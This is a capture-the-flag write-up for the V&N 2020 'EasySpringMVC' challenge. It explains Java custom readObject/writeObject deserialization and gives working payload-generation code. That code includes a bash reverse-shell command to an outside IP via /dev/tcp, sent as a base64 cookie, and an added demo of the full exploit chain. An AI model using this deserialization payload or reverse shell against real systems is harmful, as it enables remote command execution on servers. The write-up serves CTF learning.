Problem-solving record: [V&N 2020 Open] EasySpringMVC

Challenge link: https://buuoj.cn/challenges
Reference links: 2020 V&N internal contest WriteUp
Learning Java deserialization vulnerabilities from one challenge
V&N Open 2020 writeup

Java deserialization

In-depth understanding of serialization: writeObject, readObject, readResolve

In summary: if the target class does not define private writeObject or readObject methods, ObjectOutputStream and ObjectInputStream use the default mechanism, which serializes and deserializes the class's non-transient fields. If the target class does define private writeObject(ObjectOutputStream) or readObject(ObjectInputStream) methods, the stream classes look them up reflectively and call them instead, and the class then fully controls what is written to, and read from, the stream. A custom readObject that calls in.readObject() therefore gets back whatever object the writer placed in the stream at that position, not necessarily a field of the class.

Here the Tools class has a readObject:

private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
    // Reads the next object from the stream and runs it as a command line
    Object obj = in.readObject();
    new ProcessBuilder((String[]) obj).start();
}

This is in fact a backdoor: the server-side readObject takes the next object in the stream, casts it to String[], and hands it to ProcessBuilder as a command array, so whoever controls the serialized bytes controls the command. We can rewrite writeObject in our own copy of the Tools class so that it writes that String[] into the stream, and thus generate the payload:

private void writeObject(ObjectOutputStream out) throws IOException {
    // Writes only the command array; no field of Tools goes into the stream
    out.writeObject(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/174.0.234.134/11111 0>&1"});
}

Generate the payload with Main (the base64 string is what gets sent in the cookie):

import java.util.Base64;

public class Main {
    public static void main(String[] args) {
        Tools tools = new Tools();
        Base64.Encoder encoder = Base64.getEncoder();
        byte[] serialized = new byte[0];
        try {
            // Tools.create serializes the object to bytes (its body is not shown in the writeup);
            // because of the custom writeObject above, the bytes carry the command array
            serialized = Tools.create(tools);
        } catch (Exception e) {
            e.printStackTrace();
        }
        String cookie = encoder.encodeToString(serialized);
        System.out.println(cookie);
    }
}
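The following is an added, self-contained example (not code from the writeup or the challenge) that puts the two halves together: a stand-in Tools class carrying the challenge's backdoor readObject and the attacker-side writeObject, a serialize helper standing in for Tools.create (whose body the writeup does not show), and the server-side deserialization step that fires the command. It uses a harmless echo instead of the reverse shell, and the serialVersionUID, the default package, and the file path are assumptions for the demo; against the real target the class name, package and serialVersionUID must match the server's Tools class or ObjectInputStream rejects the stream with InvalidClassException before readObject is ever called.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Base64;

// Stand-in for the challenge's Tools class. Top-level so the class name written into
// the stream is plain "Tools"; the package and serialVersionUID are assumptions and
// would have to match the server's class in a real attack.
class Tools implements Serializable {
    private static final long serialVersionUID = 1L;

    // Harmless command for the demo; the writeup puts a bash reverse shell here.
    static final String[] COMMAND = {"/bin/sh", "-c", "echo reached readObject > /tmp/easyspringmvc_demo"};

    // The backdoor as found in the challenge: the next object in the stream is cast to
    // String[] and executed. Nothing here reads any field of Tools (no defaultReadObject).
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        Object obj = in.readObject();
        new ProcessBuilder((String[]) obj).start();
    }

    // Attacker-side replacement: instead of serializing fields, write the command array
    // at exactly the position the server's readObject will read from.
    private void writeObject(ObjectOutputStream out) throws IOException {
        out.writeObject(COMMAND);
    }
}

public class ToolsPayloadDemo {

    // Stand-in for Tools.create(tools): plain Java serialization to a byte array.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // What the vulnerable endpoint does with the cookie value: decode and deserialize.
    // Deserializing a Tools instance invokes Tools.readObject, which runs the command.
    static Object deserialize(String cookie) throws IOException, ClassNotFoundException {
        byte[] data = Base64.getDecoder().decode(cookie);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Attacker side: build the payload exactly as Main in the writeup does.
        String cookie = Base64.getEncoder().encodeToString(serialize(new Tools()));
        System.out.println("cookie = " + cookie);

        // Server side: the stream holds the Tools class descriptor followed by a String[]
        // object and nothing else, so readObject receives the command array and executes it.
        Object back = deserialize(cookie);
        System.out.println("deserialized " + back.getClass().getName()
                + "; check /tmp/easyspringmvc_demo for the command's output");
    }
}
```

Compile and run with `javac ToolsPayloadDemo.java && java ToolsPayloadDemo`. The point worth noticing when building such a payload is that the attacker's Tools class never needs the server's real fields or logic: only the stream layout matters, and since the server's readObject consumes exactly one object, the custom writeObject has to write exactly one String[] and nothing more.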


Source: www.cnblogs.com/20175211lyz/p/12422914.html